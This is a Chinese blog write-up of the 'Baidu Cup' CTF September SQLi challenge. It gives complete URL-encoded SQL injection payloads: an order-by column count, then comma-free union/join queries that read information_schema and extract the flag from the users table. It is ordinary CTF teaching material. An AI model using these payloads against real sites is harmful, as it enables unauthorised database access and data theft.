“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量734 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: sql mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41168609/article/details/107538347
版权

“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索

解题思路

1. 具有SQL注入点连接:
http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id

2. 逗号之后被截断了,使用无逗号注入mysql无逗号的注入技巧

3. 判断字段个数 (SQL语句出错时,id原样输出)
payload:

l0gin.php?id=1%27%20order%20by%202%20%23

在这里插入图片描述

order by 3 时就会报错。

4. 查询数据库名
采用join方式

l0gin.php?id=4%27 union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema=database()) b %23

在这里插入图片描述

5. 查询表名

l0gin.php?id=4%27 union select * from (select 1) a join (select GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME='users') b %23

在这里插入图片描述

6. flag

http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id=4%27 union select * from (select 1) a join (select flag_9c861b688330 from users) b %23

在这里插入图片描述

CodeRoc
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
百度CTF比赛 十一月 题目名称:Mangager
qq_41168609的博客
07-24 841
百度CTF比赛 十一月 题目名称:Mangager 题目内容: 进入后台,我就会升职加薪当上总经理出任CEO迎娶白富美走向人生巅峰,现在想想还有点小激动。 解题思路 SQL注入,盲注。因为用户名和密码输入错误,提示信息不同。可以对用户名进行盲注,当提示下图信息,说明猜测正确 2. 抓包分析 _nonce=f46bb1c2ad026b360b3dfe4d615754826696482修改后会被检查到,说明他有用。 2. 查找_nonce怎么得到 在login.js 可以看到对它进行了赋值,但是
百度CTF比赛 九月 SQLi 解题思路
****的博客
10-15 1107
题目简介 题目名称SQLi 题目内容:后台获取flag线索 解题思路 打开地址使用burp抓包发现“l0gin.php?id=1”。 打开“l0gin.php?id=1”地址 使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。 开始注入 猜测数据库名称 猜测数据库名...
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1091
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
i春秋 “百度CTF比赛 九月 SQLi writeup
weixin_43442029的博客
01-12 558
0x00 打开题目链接后是一个空白页面,老规矩,去源代码找线索,于是就发现了提示login.php?id=1。 由题目可以知道这一题是SQL注入有关,那url的参数id应该就是注入点了。不过我试了好几次都没有特殊的回显,后来在网上搜到一些提示说真正的页面是l0gin.php。不得不说出题人和解出来的人脑洞是真的大。(不过之后做了一些其他题目后才发现这次比赛的出题人很喜欢这样的命名方式,可能是这样想...
"迎圣诞,拿大奖"赛题——SQLI
Ramona的博客
12-22 656
0x01 本题所需知识清单: 1.php sprintf()函数漏洞:https://blog.csdn.net/WQ_BCJ/article/details/85057447 2.布尔盲注基本playload及流程:https://blog.csdn.net/WQ_BCJ/article/details/84592445 3.Burpsuit  Intruder暴力猜解:https://...
百度CTF比赛 九月------code
大方子
08-16 3069
============================= 个人收获: 1.phpstorm创建的文件会自动穿件idea,里面的workspace.xml会保存目录结构 2.URL文件包含要多注意   =============================   题目:   刚开始以为是隐写,保存到本地打开看没有什么奇怪的地方,打开源码也很正常 但是URL的连接引起我...
CTFhub-sqli注入-报错注入
ssss39的博客
08-24 1351
group_concat(目标值)
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
CTF Web解题大解密:如何找到神秘的Flag,成为夺旗赛的MVP
12-29
CTF,全称Capture The Flag,是一种网络安全竞赛,参赛者需在虚拟环境中寻找并夺取对方的旗帜。而Web解题,则是CTF比赛中的一种重要类型。 在CTF Web解题中,我们的目标是找到隐藏在网站中的Flag。这些Flag就像宝藏...
工匠-CTF题目+exp+解题思路)
04-01
CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现网络参与,这种模式的CTF竞赛与ACM编程...资源包括工匠比赛的三道题目和exp,并详细写出了解题思路。
2018强网CTF-题目整理-校本图片Readme.zip
12-18
2018强网CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── 题目名称:...
ctf比赛题目.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
安全测试学习】自动化注入攻击之 FuzzDB和Burp 组合拳
aovenus的专栏-测试新时代(微信公众号:测试新时代)
11-18 1876
自动化注入攻击之 FuzzDB和BurpSuite 组合拳
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
who are you-实验吧1
Gunther的博客
09-03 3075
who are you 参考了各处blog:发现只有这个链接可以求出flag 在看看求不出来的链接的内容: 简书 作者:Ovie #-*-coding:utf-8-*- import requests import string url="http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess='abcdefghijklmn
if条件是Boolean类型,后台做判断只需判断flag=null情况即可
尤宗旭的博客
09-19 1万+
当我们传入的参数类型是Boolean类型时,我们不能像以往判断 &lt;if test="flag != null and flag!=''"&gt; and t.flag = #{flag} &lt;/if&gt; 因为boolean传入后台是相当于‘’,所以我们只需这样做判断即可: &lt;if test="flag != null"&gt; and t.flag = ...
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3942
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
二、CTF-Web-SQLi-Labs(记录CTF学习)
qq_27920699的博客
12-16 318
个人CTF学习之路
福建闽盾 ctf比赛题目
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛题目CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值